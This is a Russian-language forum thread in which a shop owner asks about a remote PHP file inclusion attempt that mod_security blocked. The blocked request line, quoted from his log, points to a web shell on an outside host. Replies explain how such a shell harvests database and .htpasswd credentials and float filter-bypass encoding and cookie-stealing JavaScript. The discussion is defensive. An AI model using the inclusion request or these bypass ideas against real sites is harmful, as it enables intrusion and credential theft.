Это типа кто-то либо проверяет путем перебора известных уязвимостей, либо знает точно, что твой index.php не достаточно корректно проверяет запросы на предмет того, откуда пришел запрос, с локальной системы, или снаружи. Вот тебе и пытаются насунуть какой-то бэкдор. Насколько успешно, не знаю..

Насколько я понимаю, это попытка межсайтового скриптинга. Здесь описана похожая ситуация -> http://www.apachelounge.com/forum/viewtopic.php?p=831

[quote=Ne01eX]Насколько я понимаю, это попытка межсайтового скриптинга. Здесь описана похожая ситуация -> http://www.apachelounge.com/forum/viewtopic.php?p=831[/quote]
У меня как раз и стоит mod_security, как предлагается сделать в теме по ссылке , он то эту попытку и тормозит и в свой лог пишет. Я спрашиваю - может кто знает, что этот скрипт делает? он легко открывается как текстовый файл по этой ссылке http://www.preussenrebs.de/site/images/C.txt , но он длинючий и я в нем не шарю. Для чего спрашиваю? - чтобы понять что он делает и пошарится у себя в системе, поискать следы работы его или подобного.

Что-то нет там уже этого файла.
У меня как-то черви через инжект хачили старые джумлы. Первоночально я заблокировал инжекты в принципе, а после обновления платформы включил обратно. Сейчас уже больше полугода не наблюдал, чтобы у кого-то получалось до меня пробраться...

Я предусмотрительно сохранил www.nce.ru/load/wzlom.zip

[quote=Geosan]Не селен в скриптах, может кто подскажет.
Модуль безопасности апача выдает, что защитил от такой вот иньекции GET http://www.nce.ru/index.php?module=http://www.preussenrebs.de/site/image...
скриптик лежит здесь http://www.preussenrebs.de/site/images/C.txt он длинный и я в нем не понимаю, что он делает? [/quote]
Ну здесь всё очень просто :-) ,
это проверка на удалённый php-инклюдинг, фаил C.txt является web шелом, скорее всего от рст , подробнее можно найти в гугле
<span class='smallblacktext'>[ Редактирование 27.04.2007 - 18:39:52 ]</span>

вот сейчас посмотрел на ваш сайт :-) как я и думал ;-) скрипт является пхп сшелом с возможностью выполнения команд через командную строку в браузере,
а вообще моё мнение вы выбрали не тот движок для магазина "postnuke" как и PHPnuke достаточно дыряв.

Я так понимаю, он должен создать где-то пхпшный файл, чтобы можно было в любой момен обратиться к нему. Просмотрел все директории сайта, нигде ничего не нашел. Про нюку знаю, что он дырявый, надеюсь на модуль к апачу, который режет такие обращения, как, например, он отследил выше приведеное. Почему не хочу менять? - сайт хорошо проиндексирован поисковиками, большенство покупателей переходят на сайт с поисковиков,переход на другой движок на время собьет все ссылки, а это чуствительно....
<span class='smallblacktext'>[ Редактирование 27.04.2007 - 23:54:08 ]</span>

В принцепе вы правильно понимаете, но вы глубоко заблуждаетесь что:
"Просмотрел все директории сайта, нигде ничего не нашел." - берём теоретически: поподя на ваш сайт он первым делом будит искать фаил конфигурации подключения к базе данных (предполпжим что на ваш сервер уже залит шел,), найдя его он подключится к базе данных и уже от туда вытащит все пароли\мыла\логины так же он перейдёт в дерикторию магазина, и если я не ошибаюсь она у вас запароллена .htpasse "помоему так пишется" так вот о откроет данный фаил просмотрит логин и пасс и вот он уже в нутри вашего магазина.
Так же по поводу "надеюсь на модуль к апачу, который режет такие обращения, как, например, он отследил выше приведеное. "
вот вчела я проверял на введённые символы и правда он их фильтрует, но я не пробывал закадировать их а так же можно попробовать вставить в форуме ява скрипт который будет отлавливать кукисы.
Извиняюсь нет времени ответить надо в город.